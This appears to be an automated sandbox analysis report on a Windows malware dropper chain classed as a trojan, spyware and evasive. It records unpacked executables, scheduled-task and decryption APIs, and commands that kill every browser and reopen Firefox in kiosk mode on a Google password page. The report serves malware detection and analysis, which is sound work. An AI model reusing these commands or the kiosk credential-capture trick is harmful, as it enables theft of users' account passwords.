Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06426594 13_2_06426594
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642F24D 13_2_0642F24D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641625D 13_2_0641625D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EB20F 13_2_063EB20F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640BA79 13_2_0640BA79
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063ED27D 13_2_063ED27D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640E205 13_2_0640E205
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642A20C 13_2_0642A20C
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E7267 13_2_063E7267
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E8A5A 13_2_063E8A5A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641D226 13_2_0641D226
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F5A49 13_2_063F5A49
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641B23C 13_2_0641B23C
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064092C7 13_2_064092C7
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640F2DF 13_2_0640F2DF
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06408AE3 13_2_06408AE3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640EAF6 13_2_0640EAF6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F02F9 13_2_063F02F9
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F8AD8 13_2_063F8AD8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641DAAB 13_2_0641DAAB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F22CF 13_2_063F22CF
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06412ABA 13_2_06412ABA
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06401B46 13_2_06401B46
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063ECB33 13_2_063ECB33
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06414B50 13_2_06414B50
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06405363 13_2_06405363
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06419B66 13_2_06419B66
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641BB6D 13_2_0641BB6D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642731B 13_2_0642731B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EC34A 13_2_063EC34A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E9B49 13_2_063E9B49
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641A3C6 13_2_0641A3C6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06413BCA 13_2_06413BCA
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FA3A7 13_2_063FA3A7
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E9389 13_2_063E9389
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641CBF9 13_2_0641CBF9
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FAB86 13_2_063FAB86
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064173F8 13_2_064173F8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642C3FE 13_2_0642C3FE
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F73FF 13_2_063F73FF
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06422B86 13_2_06422B86
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064153AB 13_2_064153AB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EDBD5 13_2_063EDBD5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064123B8 13_2_064123B8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642DBB8 13_2_0642DBB8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EE033 13_2_063EE033
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E981B 13_2_063E981B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06405065 13_2_06405065
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EC80F 13_2_063EC80F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063ED80F 13_2_063ED80F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FA00E 13_2_063FA00E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EF802 13_2_063EF802
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640C87D 13_2_0640C87D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641C806 13_2_0641C806
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640580C 13_2_0640580C
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0643083B 13_2_0643083B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064228C6 13_2_064228C6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064218C9 13_2_064218C9
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064290F1 13_2_064290F1
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06429883 13_2_06429883
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642B883 13_2_0642B883
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F48F8 13_2_063F48F8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06402888 13_2_06402888
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E88F2 13_2_063E88F2
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641008F 13_2_0641008F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F28E2 13_2_063F28E2
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641709E 13_2_0641709E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064068A0 13_2_064068A0
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EF0DD 13_2_063EF0DD
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641B8A6 13_2_0641B8A6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641F0BB 13_2_0641F0BB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064210BD 13_2_064210BD
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06404147 13_2_06404147
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06428149 13_2_06428149
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640214E 13_2_0640214E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06410950 13_2_06410950
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640B158 13_2_0640B158
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0640A95E 13_2_0640A95E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063EE91E 13_2_063EE91E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06419165 13_2_06419165
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06420173 13_2_06420173
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0642D173 13_2_0642D173
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063FD161 13_2_063FD161
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06403927 13_2_06403927
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F2157 13_2_063F2157
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F114B 13_2_063F114B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064081D0 13_2_064081D0
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_064349DA 13_2_064349DA
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_0641A9E4 13_2_0641A9E4
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063E698E 13_2_063E698E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_063F3187 13_2_063F3187
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Code function: 13_2_06407998 13_2_06407998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 1148
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SxQyhJr[1].exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SxQyhJr.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Section: ZLIB complexity 0.9978499659400545
Source: file.exe Static PE information: Section: egarwnqv ZLIB complexity 0.99483142788319
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9978499659400545
Source: skotes.exe.0.dr Static PE information: Section: egarwnqv ZLIB complexity 0.99483142788319
Source: random[2].exe.6.dr Static PE information: Section: jyijtabb ZLIB complexity 0.9941472364245416
Source: 98a7b9f337.exe.6.dr Static PE information: Section: jyijtabb ZLIB complexity 0.9941472364245416
Source: random[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9975065104166667
Source: random[1].exe.6.dr Static PE information: Section: bioduybg ZLIB complexity 0.9947613765105741
Source: a6f0d09f38.exe.6.dr Static PE information: Section: ZLIB complexity 0.9975065104166667
Source: a6f0d09f38.exe.6.dr Static PE information: Section: bioduybg ZLIB complexity 0.9947613765105741
Source: random[1].exe0.6.dr Static PE information: Section: sqwnkuay ZLIB complexity 0.9946332324276432
Source: b5da647ae3.exe.6.dr Static PE information: Section: sqwnkuay ZLIB complexity 0.9946332324276432
Source: random[1].exe.6.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: a6f0d09f38.exe.6.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FieldCalculator.cs Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FilteredInspector.cs Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FilteredInspector.cs Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@53/34@58/16
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:64:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT * FROM events WHERE timestamp BETWEEN date(:dateFrom) AND date(:dateTo);
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE events (id INTEGER PRIMARY KEY, type INTEGER NOT NULL, count INTEGER NOT NULL, timestamp DATE );
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: INSERT INTO events (type, count, timestamp) VALUES (:type, 1, date(:date));
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;;
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;;Fy6
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE events SET count = count + 1 WHERE id = :id;-
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT sum(count) FROM events;9'
Source: a6f0d09f38.exe, 0000000D.00000003.2574863840.0000000005B85000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2574229742.0000000005BB7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT sum(count) FROM events;9
Source: firefox.exe, 0000001C.00000003.2889906290.000001DEFA26F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT * FROM events WHERE type = :type AND timestamp = date(:date);
Source: file.exe Virustotal: Detection: 55%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: a6f0d09f38.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: a6f0d09f38.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: b5da647ae3.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe "C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe"
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 1148
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe "C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe "C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe "C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe"
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2296 -parentBuildID 20230927232528 -prefsHandle 2244 -prefMapHandle 2236 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91716696-7f11-4900-9d33-9e5d096728d3} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1dedeb6d310 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4160 -parentBuildID 20230927232528 -prefsHandle 3908 -prefMapHandle 3912 -prefsLen 26208 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3dd50345-4e1a-4a0d-ac3a-34bdbd555491} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1dedeb43510 rdd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe "C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4744 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5080 -prefMapHandle 5076 -prefsLen 33185 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7dd9b6f-0496-49cf-b3a6-fd4ff652e245} 8136 "\\.\pipe\gecko-crash-server-pipe.8136" 1def0e90f10 utility
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe "C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe "C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe "C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe "C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe "C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe "C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe "C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe"
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
